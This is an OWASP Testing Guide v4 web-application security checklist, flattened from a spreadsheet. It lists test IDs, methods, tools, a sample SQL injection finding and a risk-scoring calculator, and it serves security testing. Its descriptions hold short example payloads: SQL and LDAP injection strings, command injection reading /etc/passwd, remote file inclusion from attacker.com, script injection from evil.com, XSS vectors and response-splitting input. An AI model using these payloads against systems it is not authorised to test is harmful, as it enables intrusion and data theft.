OWASP: Testing Guide v4 Checklist

Information Gathering Test Name

Conduct Search Engine Discovery and Reconnaissance for
OTG-INFO-001
Information Leakage

OTG-INFO-002 Fingerprint Web Server

OTG-INFO-003 Review Webserver Metafiles for Information Leakage

OTG-INFO-004 Enumerate Applications on Webserver

Review Webpage Comments and Metadata for Information

OTG-INFO-005
Leakage
OTG-INFO-006 Identify application entry points
OTG-INFO-007 Map execution paths through application

OTG-INFO-008 Fingerprint Web Application Framework

OTG-INFO-009 Fingerprint Web Application

OTG-INFO-010 Map Application Architecture

Configuration and
Deploy Management Test Name
Testing

OTG-CONFIG-001 Test Network/Infrastructure Configuration

OTG-CONFIG-002 Test Application Platform Configuration

OTG-CONFIG-003 Test File Extensions Handling for Sensitive Information
OTG-CONFIG-004 Backup and Unreferenced Files for Sensitive Information

OTG-CONFIG-005 Enumerate Infrastructure and Application Admin Interfaces

OTG-CONFIG-006 Test HTTP Methods

OTG-CONFIG-007 Test HTTP Strict Transport Security

OTG-CONFIG-008 Test RIA cross domain policy

Identity Management
Test Name
Testing
OTG-IDENT-001 Test Role Definitions

OTG-IDENT-002 Test User Registration Process

OTG-IDENT-003 Test Account Provisioning Process

OTG-IDENT-004 Testing for Account Enumeration and Guessable User Account

OTG-IDENT-005 Testing for Weak or unenforced username policy

OTG-IDENT-006 Test Permissions of Guest/Training Accounts

OTG-IDENT-007 Test Account Suspension/Resumption Process

Authentication Testing Test Name

OTG-AUTHN-001 Testing for Credentials Transported over an Encrypted Channel

OTG-AUTHN-002 Testing for default credentials

OTG-AUTHN-003 Testing for Weak lock out mechanism

OTG-AUTHN-004 Testing for bypassing authentication schema

OTG-AUTHN-005 Test remember password functionality

OTG-AUTHN-006 Testing for Browser cache weakness

OTG-AUTHN-007 Testing for Weak password policy

OTG-AUTHN-008 Testing for Weak security question/answer

OTG-AUTHN-009 Testing for weak password change or reset functionalities

OTG-AUTHN-010 Testing for Weaker authentication in alternative channel

Authorization Testing Test Name

OTG-AUTHZ-001 Testing Directory traversal/file include

OTG-AUTHZ-002 Testing for bypassing authorization schema

OTG-AUTHZ-003 Testing for Privilege Escalation

OTG-AUTHZ-004 Testing for Insecure Direct Object References

Session Management
Test Name
Testing
OTG-SESS-001 Testing for Bypassing Session Management Schema

OTG-SESS-002 Testing for Cookies attributes

OTG-SESS-003 Testing for Session Fixation

OTG-SESS-004 Testing for Exposed Session Variables

OTG-SESS-005 Testing for Cross Site Request Forgery

OTG-SESS-006 Testing for logout functionality

OTG-SESS-007 Test Session Timeout

OTG-SESS-008 Testing for Session puzzling

Data Validation Testing Test Name

OTG-INPVAL-001 Testing for Reflected Cross Site Scripting

OTG-INPVAL-002 Testing for Stored Cross Site Scripting

OTG-INPVAL-003 Testing for HTTP Verb Tampering

OTG-INPVAL-004 Testing for HTTP Parameter pollution

OTG-INPVAL-005 Testing for SQL Injection

Oracle Testing

MySQL Testing

SQL Server Testing

Testing PostgreSQL

MS Access Testing

Testing for NoSQL injection

OTG-INPVAL-006 Testing for LDAP Injection

OTG-INPVAL-007 Testing for ORM Injection

OTG-INPVAL-008 Testing for XML Injection

OTG-INPVAL-009 Testing for SSI Injection

OTG-INPVAL-010 Testing for XPath Injection

OTG-INPVAL-011 IMAP/SMTP Injection

OTG-INPVAL-012 Testing for Code Injection

Testing for Local File Inclusion

 Testing for Remote File Inclusion

OTG-INPVAL-013 Testing for Command Injection

OTG-INPVAL-014 Testing for Buffer overflow

Testing for Heap overflow

Testing for Stack overflow
Testing for Format string
OTG-INPVAL-015 Testing for incubated vulnerabilities

OTG-INPVAL-016 Testing for HTTP Splitting/Smuggling

Error Handling Test Name

OTG-ERR-001 Analysis of Error Codes

OTG-ERR-002 Analysis of Stack Traces

Cryptography Test Name

Testing for Weak SSL/TSL Ciphers, Insufficient Transport
OTG-CRYPST-001
Layer Protection

OTG-CRYPST-002 Testing for Padding Oracle

OTG-CRYPST-003 Testing for Sensitive information sent via unencrypted channels

Business logic Testing Test Name

OTG-BUSLOGIC-001 Test Business Logic Data Validation

OTG-BUSLOGIC-002 Test Ability to Forge Requests

OTG-BUSLOGIC-003 Test Integrity Checks

OTG-BUSLOGIC-004 Test for Process Timing

OTG-BUSLOGIC-005 Test Number of Times a Function Can be Used Limits

OTG-BUSLOGIC-006 Testing for the Circumvention of Work Flows

OTG-BUSLOGIC-007 Test Defenses Against Application Mis-use

OTG-BUSLOGIC-008 Test Upload of Unexpected File Types

OTG-BUSLOGIC-009 Test Upload of Malicious Files

Client Side Testing Test Name

OTG-CLIENT-001 Testing for DOM based Cross Site Scripting

OTG-CLIENT-002 Testing for JavaScript Execution

OTG-CLIENT-003 Testing for HTML Injection

OTG-CLIENT-004 Testing for Client Side URL Redirect

OTG-CLIENT-005 Testing for CSS Injection

OTG-CLIENT-006 Testing for Client Side Resource Manipulation

OTG-CLIENT-007 Test Cross Origin Resource Sharing

OTG-CLIENT-008 Testing for Cross Site Flashing

OTG-CLIENT-009 Testing for Clickjacking

OTG-CLIENT-010 Testing WebSockets

OTG-CLIENT-011 Test Web Messaging

OTG-CLIENT-012 Test Local Storage

Not Started
Pass
Issues
N/A
 Description Tools

Use a search engine to search for Network diagrams and Configurations, Google Hacking, Sitedigger,
Credentials, Error message content. Shodan, FOCA, Punkspider
Find the version and type of a running web server to determine known
Httprint, Httprecon,
vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test". Desenmascarame
Analyze robots.txt and identify <META> Tags from website. Browser, curl, wget
Webhosting.info, dnsrecon,
Find applications hosted in the webserver (Virtual hosts/Subdomain), non- Nmap, fierce, Recon-ng,
standard ports, DNS zone transfers Intrigue
Find sensitive information from webpage comments and Metadata on Browser, curl, wget
source code.
Identify from hidden fields, parameters, methods HTTP header analysis Burp proxy, ZAP, Tamper data
Map the target application and understand the principal workflows. Burp proxy, ZAP
Find the type of web application framework/CMS from HTTP headers, Whatweb, BlindElephant,
Cookies, Source code, Specific files and folders. Wappalyzer
Identify the web application and version to determine known vulnerabilities Whatweb, BlindElephant,
and the appropriate exploits. Wappalyzer, CMSmap
Identify application architecture including Web language, WAF, Reverse
proxy, Application Server, Backend Database
Browser, curl, wget

Description Tools

Understand the infrastructure elements interactions, config management

for software, backend DB server, WebDAV, FTP in order to identify known Nessus
vulnerabilities.
Identify default installation file/directory, Handle Server errors (40*,50*),
Minimal Privilege, Software logging.
Browser, Nikto
Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) Browser, Nikto
Check JS source code, comments, cache file, backup file
(.old, .bak, .inc, .src) and guessing of filename
Nessus, Nikto, Wikto
Directory and file enumeration, comments and links in source (/admin,
Burp Proxy, dirb, Dirbuster,
/administrator, /backoffice, /backend, etc), alternative server port
(Tomcat/8080) fuzzdb, Tilde Scanner
Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary
HTTP Methods, HEAD access control bypass and XST
netcat, curl
Identify HSTS header on Web server through HTTP response header.
curl -s -D- https://domain.com/ | grep Strict
Burp Proxy, ZAP, curl
Analyse the permissions allowed from the policy files
(crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.
Burp Proxy, ZAP, Nikto

Description Tools
Validate the system roles defined within the application by creating
permission matrix.
Burp Proxy, ZAP
Verify that the identity requirements for user registration are aligned Burp Proxy, ZAP
with business and security requirements:
Determine which roles are able to provision users and what sort of Burp Proxy, ZAP
accounts they can provision.
Generic login error statement check, return codes/parameter values,
enumerate all possible valid userids (Login system, Forgot password)
Browser, Burp Proxy, ZAP
User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks) Browser, Burp Proxy, ZAP
and valid account names can easily be guessed.
Guest and Training accounts are useful ways to acquaint potential users
with system functionality prior to them completing the authorisation
process required for access.Evaluate consistency between access policy
Burp Proxy, ZAP
and guest/training account access permissions.
Verify the identity requirements for user registration align with
business/security requirements. Validate the registration process.
Burp Proxy, ZAP

Description Tools
Check referrer whether its HTTP or HTTPs. Sending data through HTTP
and HTTPS.
Burp Proxy, ZAP
Testing for default credentials of common applications, Testing for default
password of new accounts.
Burp Proxy, ZAP, Hydra
Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s Browser
resistance to unauthorized account unlocking.
Force browsing (/admin/main.php, /page.asp?authenticated=yes), Burp Proxy, ZAP
Parameter Modification, Session ID prediction, SQL Injection
Look for passwords being stored in a cookie. Examine the cookies stored
by the application. Verify that the credentials are not stored in clear text, Burp Proxy, ZAP
but are hashed. Autocompleted=off?
Check browser history issue by clicking "Back" button after logging out.
Burp Proxy, ZAP, Firefox add-
Check browser cache issue from HTTP response headers (Cache-
Control: no-cache) on CacheViewer2

Determine the resistance of the application against brute force

password guessing using available password dictionaries by evaluating Burp Proxy, ZAP, Hydra
the length, complexity, reuse and aging requirements of
passwords.
Testing for weak pre-generated questions, Testing for weak self-
generated question, Testing for brute-forcible answers (Unlimited Browser
attempts?)
Test password reset (Display old password in plain-text?, Send via
email?, Random token on confirmation email ?), Test password change Browser, Burp Proxy, ZAP
(Need old password?), CSRF vulnerability ?
Understand the primary mechanism and Identify other channels (Mobile
App, Call center, SSO)
Browser

Description Tools
dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote
File Inclusion.
Burp Proxy, ZAP, Wfuzz
Access a resource without authentication?, Bypass ACL, Force browsing
(/admin/adduser.jsp)
Burp Proxy (Autorize), ZAP
Testing for role/privilege manipulate the values of hidden variables.
Change some param groupid=2 to groupid=1
Burp Proxy (Autorize), ZAP
Force changing parameter value (?invoice=123 -> ?invoice=456) Burp Proxy (Autorize), ZAP

Description Tools
SessionID analysis prediction, unencrypted cookie transport, Burp Proxy, ForceSSL, ZAP,
brute-force. CookieDigger
Check HTTPOnly and Secure flag, expiration, inspect for sensitive
Burp Proxy, ZAP
data.
The application doesn't renew the cookie after a successfully user
Burp Proxy, ZAP
authentication.
Encryption & Reuse of session Tokens vulnerabilities, Send
Burp Proxy, ZAP
sessionID with GET method ?
 Burp Proxy
(csrf_token_detect), burpy,
URL analysis, Direct access to functions without any token. ZAP
Check reuse session after logout both server-side and SSO. Burp Proxy, ZAP
Check session timeout, after the timeout has passed, all session tokens
should be destroyed or be unusable.
Burp Proxy, ZAP
The application uses the same session variable for more than one
purpose. An attacker can potentially access pages in an order
unanticipated by the developers so that the session variable is set in one
Burp Proxy, ZAP
context and then used in another.

Description Tools
Check for input validation, Replace the vector used to identify XSS, XSS
with HTTP Parameter Pollution.
Burp Proxy, ZAP, Xenotix XSS
Check input forms/Upload forms and analyze HTML codes, Leverage Burp Proxy, ZAP, BeEF, XSS
XSS with BeEF Proxy
Craft custom HTTP requests to test the other methods to bypass URL
authentication and authorization.
netcat
Identify any form or action that allows user-supplied input to bypass Input ZAP, HPP Finder (Chrome
validation and filters using HPP Plugin)
Burp Proxy (SQLipy), SQLMap,
Pangolin, Seclists (FuzzDB)
Union, Boolean, Error based, Out-of-band, Time delay.
Identify URLs for PL/SQL web applications, Access with PL/SQL
Packages, Bypass PL/SQL Exclusion list, SQL Injection
Orascan, SQLInjector
Identify MySQL version, Single quote, Information_schema, Read/Write SQLMap, Mysqloit, Power
file. Injector
Comment operator (- -), Query separator (;), Stored procedures SQLMap, SQLninja, Power
(xp_cmdshell) Injector
Determine that the backend database engine is PostgreSQL by using
the :: cast operator. Read/Write file, Shell Injection (OS command)
SQLMap
Enumerate the column through error-based (Group by), Obtain database
schema combine with fuzzdb.
SQLMap
Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with
reserved variable name, operator.
NoSQLMap
/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=* Burp Proxy, ZAP
pass=password
Testing ORM injection is identical to SQL injection testing Hibernate, Nhibernate
Check with XML Meta Characters
Burp Proxy, ZAP, Wfuzz
', " , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG
• Presense of .shtml extension
• Check for these characters
Burp Proxy, ZAP
< ! # = / . " - > and [a-zA-Z0-9]
• include String = <!--#include virtual="/etc/passwd" -->
Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1 Burp Proxy, ZAP
Password: ‘ or ‘1’ = ‘1
• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the Burp Proxy, ZAP
client
• IMAP/SMTP command injection (Header, Body, Footer)
Enter OS commands in the input field. Burp Proxy, ZAP, Liffy,
?arg=1; system('id') Panoptic
LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-
encode/resource)
Burp Proxy, fimap, Liffy
RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page
Burp Proxy, fimap, Liffy
Understand the application platform, OS, folder structure, relative
path and execute OS commands on a Web server.
Burp Proxy, ZAP, Commix
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\
• Testing for heap overflow vulnerability
Immunity Canvas, Spike, MSF,
• Testing for stack overflow vulnerability
Nessus
• Testing for format string vulnerability

File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured

Burp Proxy, BeEF, MSF
servers (Tomcat, Plesk, Cpanel)
param=foobar%0d%0aContent-Length:%200%0d%0a%0d
%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/
Burp Proxy, ZAP, netcat
html%0d%0aContent-Length:%2035%0d%0a%0d
%0a<html>Sorry,%20System%20Down</html>

Description Tools
Locate error codes generated from applications or web servers. Collect
sensitive information from that errors (Web Server, Application Server, Burp Proxy, ZAP
Database)
• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax Burp Proxy, ZAP
• Access to internal pages without authentication
• Bypassing application flow

Description Tools

Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, testssl.sh, SSL Breacher
CRIME, POODLE)

Compare the responses in three different states:

• Cipher text gets decrypted, resulting data is correct. PadBuster, Poracle, python-
• Cipher text gets decrypted, resulting data is garbled and causes paddingoracle, POET
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.
Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…) Burp Proxy, ZAP, Curl
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)

Description Tools
• Looking for data entry points or hand off points between systems or
software. Burp Proxy, ZAP
• Once found try to insert logically invalid data into the application/system.

• Looking for guessable, predictable or hidden functionality of fields.

• Once found try to insert logically valid data into the application/system Burp Proxy, ZAP
allowing the user go through the application/system against the normal
busineess logic workflow.
•Looking for parts of the application/system (components i.e. For example,
input fields, databases or logs) that move, store or handle
data/information.
• For each identified component determine what type of data/information
is logically acceptable and what types the application/system should
guard against. Also, consider who according to the business logic is Burp Proxy, ZAP
allowed to insert, update and delete data/information and in each
component.
• Attempt to insert, update or edit delete the data/information values with
invalid data/information into each component (i.e. input, database, or log)
by users that .should not be allowed per the busines logic workflow.
• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not Burp Proxy, ZAP
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.
• Looking for functions or features in the application or system that should
not be executed more that a single time or specified number of times
during the business logic workflow.
• For each of the functions and features found that should only be Burp Proxy, ZAP
executed a single time or specified number of times during the business
logic workflow, develop abuse/misuse cases that may allow a user to
execute more than the allowable number of times.
• Looking for methods to skip or go to steps in the application process in a
different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or Burp Proxy, ZAP
perform an action that is "not acceptable" per the the business logic
workflow.
Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
Burp Proxy, ZAP
• Actions that log a user out or lock their account
• Review the project documentation and perform some exploratory testing
looking for file types that should be "unsupported" by the
application/system.
• Try to upload these “unsupported” files an verify that it are properly Burp Proxy, ZAP
rejected.
• If multiple files can be uploaded at once, there must be tests in place to
verify that each file is properly evaluated.
PS. file.phtml, shell.phPWND, SHELL~1.PHP
• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it
is correctly rejected. Burp Proxy, ZAP
• If multiple files can be uploaded at once, there must be tests in place to
verify that each file is properly evaluated.

Description Tools

Test for the user inputs obtained from client-side JavaScript Objects Burp Proxy, DOMinator
Inject JavaScript code:
www.victim.com/?javascript:alert(1)
Burp Proxy, ZAP
Send malicious HTML code:
?user=<img%20src='aaa'%20onerror=alert(1)>
Burp Proxy, ZAP
Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site
Burp Proxy, ZAP
Inject code in the CSS context :
• www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;
(Opera [8,12])
Burp Proxy, ZAP
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
External JavaScript could be easily injected in the trusted web site Burp Proxy, ZAP
www.victim.com/#http://evil.com/js.js
Check the HTTP headers in order to understand how CORS is
used (Origin Header)
Burp Proxy, ZAP
Decompile, Undefined variables, Unsafe methods, Include malicious SWF FlashBang, Flare, Flasm,
(http://victim/file.swf?lang=http://evil SWFScan, SWF Intruder
Discover if a website is vulnerable by loading into an iframe, create simple Burp Proxy, ClickjackingTool
web page that includes a frame containing the target.
Identify that the application is using WebSockets by inspecting ws:// or
wss:// URI scheme.Use Google Chrome's Developer Tools to view the Burp Proxy, Chrome, ZAP,
Network WebSocket communication. Check Origin, Confidentiality and WebSocket Client
Integrity, Authentication, Authorization, Input Sanitization
Analyse JavaScript code looking for how Web Messaging is implemented.
How the website is restricting messages from untrusted domain and how Burp Proxy, ZAP
the data is handled even for trusted domains
Determine whether the website is storing sensitive data in the storage.
Chrome, Firebug, Burp Proxy,
XSS in localstorage
http://server/StoragePOC.html#<img src=x onerror=alert(1)> ZAP
 Result Remark

Not Started

Not Started

Not Started

Not Started

Not Started
Not Started
Not Started

Not Started

Not Started

Not Started

Result Remark

Not Started

Not Started
Not Started
Not Started

Not Started

Not Started

Not Started

Not Started

Result Remark

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started

Not Started

Result Remark

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Result Remark

Not Started

Not Started

Not Started
Not Started

Result Remark

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started
Not Started

Not Started

Result Remark

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started

Not Started

Not Started
Not Started
Not Started
Not Started

Not Started

Result Remark

Not Started

Not Started

Result Remark

Not Started

Not Started

Not Started

Result Remark

Not Started

Not Started
Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Result Remark
Not Started
Not Started

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started

Not Started

Not Started

Not Started

Not Started
No. Vulnerability Name OTG Affected Host/Path Impact Likelihood Risk
www.example.com/ High
1 SQL Injection OTG-INPVAL-005 High Moderate
news.php (id,page)
 Test
Observation/Implication Recommendation
Evidence
xxx-1
 OWASP Risk Assessment Calculator
Risk Assessment Calculator
Likelihood factors
Threat Agent Factors
Skills required Some technical skills [3] 3
Motive Possible reward [4] 4
Opportunity Full access or expensive resources required [0] 0
Population Size System Administrators [2] 2

Vulnerability Factors
Easy of Discovery Practically impossible [1] 1
Ease of Exploit Easy [5] 5
Awareness Hidden [4] 4
Intrusion Detection Logged and reviewed [3] 3

Likelihood score: 2.75

Overall Risk Severity : Low

Impact
Likelihood Low ->Moderate<- High
->Low<- Note ->Low<- Moderate
Moderate Low Moderate High
High Moderate High Critical
k Assessment Calculator
sessment Calculator
Impact factors REF
Technical Impact Factors
Loss of confidentiality Minimal non-sensitive data disclosed [2] 2
Loss of Integrity All data totally corrupt [9] 9
Loss of Availability Minimal secondary services interrupted [1] 1
Loss of Accountability Not Applicable [0] 0

Business Impact Factors

Financial damage Minor effect on annual profit [3] 3
Reputation damage Loss of major accounts [4] 4
Non-Compliance Clear violation [5] 5
Privacy violation One individual [3] 3

Impact score: 3.375

Low
http://paradoslabs.nl/owaspcalc/index.php
Skills required Motive
Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
No technical skills [1] 1 Low or no reward [1] 1
Some technical skills [3] 3 Possible reward [4] 4
Advanced computer user [5] 5 High reward [9] 9
Network and programming skills [6] 6
Security penetration skills [9] 9

Loss of confidentiality Loss of Integrity

Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Minimal non-sensitive data disclosed [2] 2 Minimal slightly corrupt data [1] 1
Extensive non-sensitive data disclosed [6] 6 Minimal seriously corrupt data [3] 3
Extensive critical data disclosed [7] 7 Extensive slightly corrupt data [5] 5
All data disclosed [9] 9 Extensive seriously corrupt data [7] 7
All data totally corrupt [9] 9
Opportunity Population Size
Select an option Select an option
Full access or expensive resources required [0] 0 Not Applicable [0] 0
Special access or resources required [4] 4 System Administrators [2] 2
Some access or resources required [7] 7 Intranet Users [4] 4
No access or resources required [9] 9 Partners [5] 5
Authenticated users [6] 6
Anonymous Internet users [9] 9

Loss of Availability Loss of Accountability

Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Minimal secondary services interrupted [1] 1 Attack fully traceable to individual [1] 1
Minimal primary services interrupted [5] 5 Attack possibly traceable to individual [7] 7
Extensive primary services interrupted [7] 7 Attack completely anonymous [9] 9
All services completely lost [9] 9
Easy of Discovery Ease of Exploit
Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Practically impossible [1] 1 Theoretical [1] 1
Difficult [3] 3 Difficult [3] 3
Easy [7] 7 Easy [5] 5
Automated tools available [9] 9 Automated tools available [9] 9

Financial damage Reputation damage

Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Damage costs less than to fix the issue [1] 1 Minimal damage [1] 1
Minor effect on annual profit [3] 3 Loss of major accounts [4] 4
Significant effect on annual profit [7] 7 Loss of goodwill [5] 5
Backruptcy [9] 9 Brand damage [9] 9
Awareness Intrusion Detection
Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Unknown [1] 1 Active detection in application [1] 1
Hidden [4] 4 Logged and reviewed [3] 3
Obvious [6] 6 Logged without review [8] 8
Public knowledge [9] 9 Not logged [9] 9

Non-Compliance Privacy violation

Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Minor violation [2] 2 One individual [3] 3
Clear violation [5] 5 Hundreds of people [5] 5
High profile violation [7] 7 Thousands of people [7] 7
Millions of people [9] 9